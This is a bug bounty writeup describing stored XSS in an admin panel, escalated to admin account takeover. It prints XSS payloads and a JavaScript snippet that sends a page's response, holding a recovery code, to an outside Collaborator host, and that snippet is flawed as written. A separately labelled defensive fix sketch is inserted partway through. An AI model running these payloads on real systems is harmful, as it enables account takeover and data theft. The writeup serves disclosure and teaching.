How I made $500 with XSS

Hi Hackers, hope you are all safe. Today we have another writeup, and it's about my interesting finding on a private program where I was able to completely take over admin accounts with just a click to show my profile picture.

So let's start. I got an invitation from a private web application program, let's call it redacted.net. The web application looks like an experimental admin panel used to manage users and groups and to create articles. The login page has two features: first, new admins can access their admin panel using an access code; second, existing admins can access the admin panel using their email and password. As for me, I got my credentials from the program to log in.

After login, I moved directly to account settings. The settings page has many inputs that were interesting, so I tested all of them (except the email input) with simple HTML code, <h1>test</h1>, then saved it and refreshed the page.

I noticed the H1 tag disappeared from all the inputs and I didn't know where it was reflected. I also opened another account to see if it was reflected there, but found nothing.

So after many hours of searching without result, I decided to move on to another feature. I went to test whether the profile picture was vulnerable to XSS: I changed my profile picture to a PNG image containing an XSS payload, saved it and clicked to view it. The XSS image was not reflected, but I saw that the other inputs were reflected on this page.

I was so happy, and I changed the HTML code to this XSS payload:

><img src="https://media.geeksforgeeks.org/wp-content/uploads/20190516152959/Cross-Site-ScriptingXSS.png" onload=alert(11)>

And the XSS payload was reflected successfully.

The story doesn't finish there, because some hours after reporting, the program sent us a message explaining that XSS vulnerabilities are out of scope.

:(

After this message I was confused, but I decided to escalate the XSS to high impact. The first thing I tested was whether I could access the cookie; unfortunately I couldn't, because HttpOnly is enabled, so I can't access it using JS code.

I got a null result using the document.cookie event.

Next, I opened Burp Suite and analyzed requests and responses. After a while I found something interesting in a response.

The interesting thing I found is that the RecoveryCode is reflected in the response, along with other important information. So the scenario that came to my mind was: if I can access this page using JS code, I can use this code to take over accounts. After a while I wrote this payload:

var Http = new XMLHttpRequest();
var url = 'https://redacted.com/profile';
Http.open("GET", url);
Http.send();

var burp = 'https://burp-collaborator/test.php?id=' + Http.responseText;
Http.onreadystatechange = (e) => {
  Http.open("GET", burp);
  Http.send();
}

The role of this JS code is to send a GET request to the interesting page, and also to send a GET request to my Burp Collaborator with the response of the interesting page appended. So I uploaded my JS code to my website and used this payload in the vulnerable input to run my JS code.

"><script src="https://mywebsite.com/exploit.js"></script>

Burp Collaborator after running the JS code

As you can see, I successfully accessed the Recovery Code plus other information, and I can use it to register as a new admin and change his password, because the code does not expire.

Note: the recovery code is the same code used when an admin adds a new admin, who gets this code in his email to register.
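
The chain above depends on three gaps: settings values written into HTML without encoding, the RecoveryCode present in a response that same-origin script can read, and a code that does not expire. The sketch below shows a server-side fix for each; it is an added example, not code from the program or from this writeup, and the field names (recoveryCode, issuedAt, usedAt), the 15-minute lifetime and the CSP value are assumptions.

```javascript
// Added example; not the program's code. Field names, TTL and CSP are assumed.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Encode user-controlled settings values before they are placed in HTML.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render one settings field inside a quoted attribute, the context the payloads break out of.
function renderField(name, value) {
  return `<input name="${escapeHtml(name)}" value="${escapeHtml(value)}">`;
}

// Build the profile response from an allow-list, so secrets never reach page-readable data.
const PUBLIC_FIELDS = ['id', 'name', 'email'];
function toProfileResponse(user) {
  return Object.fromEntries(PUBLIC_FIELDS.filter((k) => k in user).map((k) => [k, user[k]]));
}

// Compare codes without an early exit on the first differing character.
function constantTimeEqual(a, b) {
  if (a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Recovery codes get a short lifetime and can be redeemed only once.
const RECOVERY_TTL_MS = 15 * 60 * 1000; // assumed policy
function redeemRecoveryCode(record, presented, now = Date.now()) {
  if (record.usedAt !== null) return false;                   // already used
  if (now - record.issuedAt > RECOVERY_TTL_MS) return false;  // expired
  if (!constantTimeEqual(record.code, presented)) return false;
  record.usedAt = now;
  return true;
}

// Defence in depth: script-src 'self' refuses external scripts and inline
// handlers such as onload=, and connect-src 'self' refuses XHR to other hosts.
const CSP = "default-src 'self'; script-src 'self'; connect-src 'self'; img-src 'self' data:";
```

Send the CSP value in the Content-Security-Policy response header of every admin panel page; it limits the damage if an encoding call is missed somewhere.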

Bug Timeline:

Reported: 21 Sep 2021
Triaged: 29 Sep 2021
Reward: 29 Sep 2021

Thank you for reading, see you in the next blog.

My Twitter: https://www.twitter.com/nvccim

Security Researcher